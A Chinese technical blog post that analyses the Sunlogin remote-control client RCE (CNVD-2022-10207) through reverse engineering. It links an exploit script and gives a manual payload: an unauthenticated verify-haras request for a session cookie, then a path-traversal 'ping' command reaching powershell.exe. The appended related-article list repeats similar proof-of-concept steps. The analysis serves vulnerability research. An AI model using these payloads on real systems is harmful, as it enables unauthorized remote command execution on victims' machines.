向日葵RCE原理解析——基于逆向工程的静态分析技术

最新推荐文章于 2024-05-10 09:01:33 发布
最新推荐文章于 2024-05-10 09:01:33 发布
阅读量728 收藏 2
点赞数 1
分类专栏: 逆向工程 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lmboss/article/details/129357838
版权

向日葵RCE 脆弱版本:SunloginClient_11.0.0.33162_X64

一个快速利用的脚本

直接给链接,没什么好说的,script-kids 的最爱。

https://github.com/Mr-xn/sunlogin_rce

深入理解其背后的原理

一句话概括:if函数中的逻辑写的不严谨,导致未授权访问

Step1:问题所在:一个未授权访问的函数

在这里插入图片描述

  • 这里直接比较,action_value是否等于 verify-haras
  • 所以很常规的思路-获取此 verify-haras。我们直接访问http://****:49843/cgi-bin/rpc?action=verify-haras
  • cgi-bin:需要服务器上有 相应的程序对访问者输入的信息进行处理时,会将用户的数据存在cgi-bin目录下

Step2:一个脆弱的 check 函数

在这里插入图片描述

  • 当参数cmd的值以ping或者nslookup开头时,可以构造命令,进而实现远程命令执行利用
  • 利用思路:传参时尽量带上 , ping/ nslookup

Step3:手工payload

  1. 获取不变的cookie
    直接访问,抓包获取cookie
http://****:49843/cgi-bin/rpc?action=verify-haras
  1. exploit
###Get URL
http://****:49843/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
###Cookie Info
Cookie:CID=PEYMEjYeyKrFKyNqn18536BWNYfLDz25

在这里插入图片描述

参考资料

CNVD-2022-10207:向日葵RCE
Sunlogin RCE漏洞分析和使用

Composer_LM
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
向日葵RCE
m0_64338211的博客
03-01 1993
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现 1. 我们先安装漏洞版本的向日葵也就是<=11.0.0.33版本的, 2. 打开向日葵,连接服务器成功才可以 3. 打开之后会自动开启一个端口(40000-60000)之间随机的,我们扫描一下端口(查看安装向日葵电脑的ip) 4. 浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)一个一个端口尝试 5. 拿到CID-添加paylo..
Sunlogin_rce-main向日葵漏洞复现测试
m0_73615178的博客
02-17 372
版本。
CNVD-2022-10207:向日葵RCE
chang113的博客
06-20 4197
CNVD-2022-10207:向日葵RCE
向日葵RCE(CNVD-2022-10270/CNVD-2022-03672)
我了解豹女就像农民伯伯了解大米
03-19 1183
目录 漏洞描述: 工具复现: CS服务器上线:(失败) 漏洞描述: 上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 工具复现: 同一局域网: 攻击机:172.5
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
Apache-Tomcat从文件包含到RCE漏洞原理深入分析1
08-03
漏洞简介2020年02月20日,于CNVD公开的漏洞公告中发现Apache Tomcat文件包含漏洞(CVE-2020-1938)。Apache Tomcat为
论文研究-基于改进RCE和RBF神经网络的静态手势识别 .pdf
09-12
针对手势识别的手区域分割、手势特征提取和手势分类的三个过程,提出了一种新的静态手势识别方法。改进了传统的RCE神经网络用于手区域的分割,具有更高的运行速度和更强的抗噪能力。依Freeman链码方向提取手的边缘到...
RCE-4结构改造及其抗肿瘤活性的研究 (2015年)
05-16
RCE-4是一种甾体皂苷,具有良好的抗肿瘤活性。水解RCE-4可得到一种新的甾体皂苷元,利用SOCl2和吡啶体系进行氯代产率较高,两个产物产率共达92%,利用PCC氧化也得到两个产物,共计5个新化合物。利用核磁、红外、...
向日葵RCE复现
weixin_43622525的博客
02-28 699
目录 漏洞描述 漏洞复现 手动复现 解决方法 漏洞描述 上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 漏洞复现 下载含有漏洞版本的向日葵,win7虚拟...
向日葵RCE命令执行(Windows <=11.0.0.33)
热门推荐
m0_52400001的博客
02-16 1万+
前言 向日葵个人版企业版均受影响 for Windows <=11.0.0.33 SunloginClient 启动后会在 40000 以上随机开放一个web端口,认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执行回显rce 一、话不多说开始复现 这里用的是 vm虚拟机安装的win10系统 1. 我们先安装漏洞版本的向日葵也就是<=11.0.0.33版本的, 2. 打开向日葵,连接服务器成功才可以哦 3. 打开之后会自动开启一个端
向日葵rce漏洞复现
weixin_59872639的博客
03-01 3065
向日葵 向日葵远程控制是一款提供远程控制服务的软件。向日葵远程控制支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制客户端的设备 影响版本 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 漏洞复现 PortScan探测或其他工具探测40000到65535的开放端口 浏览器访问ip+端口号+ /c.
向日葵远控rce复现
weixin_45794666的博客
02-24 2835
向日葵 POC ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami 端口扫描 首先扫描端口 获取sid 可以通过已知向日葵端口 + cgi-bin/rpc?action=verify-haras的拼接来获取CID的值。 此时的url: http://192.168.159.151:49197/cgi-bin/rpc?action=verify-haras 每次访问不一样,但是都可以用 dmP
网络攻防|一次实战中的向日葵 RCE Bypass 360
weixin_42282189的博客
07-03 1215
点击上方蓝字关注我们在做攻防项目的时候发现了一个外网的向日葵命令执行但由于存在杀软,无法执行命令下面就来说一下我是如何绕过杀软拿到shell的自己搭了一个虚拟机,也是存在漏洞的向日葵命令执行,环境配置和目标一样,但没装360(后面会说是如何获得目标系统信息的)开始测试,发现首先我通过向日葵和杀软允许的命令判断确认是存在命令执行漏洞的通过网上搜索各种文章,晓得是利用向日葵不禁止命令,然后通过进行目录穿越来执行任意命令的。目标机器上的杀软实际上是禁止调用和等危险的进程,其他exe程序并没有禁止所以我们可以利用或
某钉RCE & 某葵RCE 复现
weixin_48421613的博客
02-17 3495
某钉RCE 影响版本 ​6.3.5​ poc dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true ​本地使用hsf搭建服务 4. ​下载受漏洞影响的版本 链接:https://pan.baidu.com/s/1ozrwoqjzwASgONavgc94OQ ​ 提取码:9bcw 公众号回复 hfs 即可获取该工具 登录该版本某钉之后,直接发送poc而后点击即可触发​ 当然了,修复
1.关于逆向工程(RE、RCE)-笔记
天使也掉毛
08-10 952
名词 逆向工程(ReverseEngineering,简称RE);代码逆向工程(ReverseCodeEngineering,简称RCE)。 逆向分析方法 静态分析:不执行代码,观察外部特征、获取文件类型、大小、PE头信息、Import/ExportAPI、内部字符串、是否运行时解压缩、注册信息、调试信息、数字证书等。同时还经常使用反汇编工具查看内部代码、分析代码。 动态...
【网络安全】一次sql注入问题的处理
最新发布
dualvencsdn的博客
05-10 389
(1)在进行问题解决之前,我们发现 ,即使我们已经在后能进行了打印,确保了不会有sql注入问题。如下。但在当时 ,依然 会有被 -dbs扫描而出的数据库思考:经过程序的打印,已经没有了不正确的sql注入;但依然可以dbs扫描打印出数据库信息 ,有可能是缓存的信息,前面扫描出来的数据库信息!(2)将sqlmap的缓存文件,如下,其中session.sqlite进行取出,用chat2db打开。发现其中的缓存 信息。如下列各图。
远程代码执行漏洞RCE原理
03-28
RCE漏洞的原理是攻击者在程序或系统中注入恶意代码,并且成功执行该代码,从而实现攻击目的。攻击者通常利用程序或系统中的安全漏洞,比如未经过滤的用户输入、未授权的访问、缓冲区溢出等进行攻击,通过给予恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值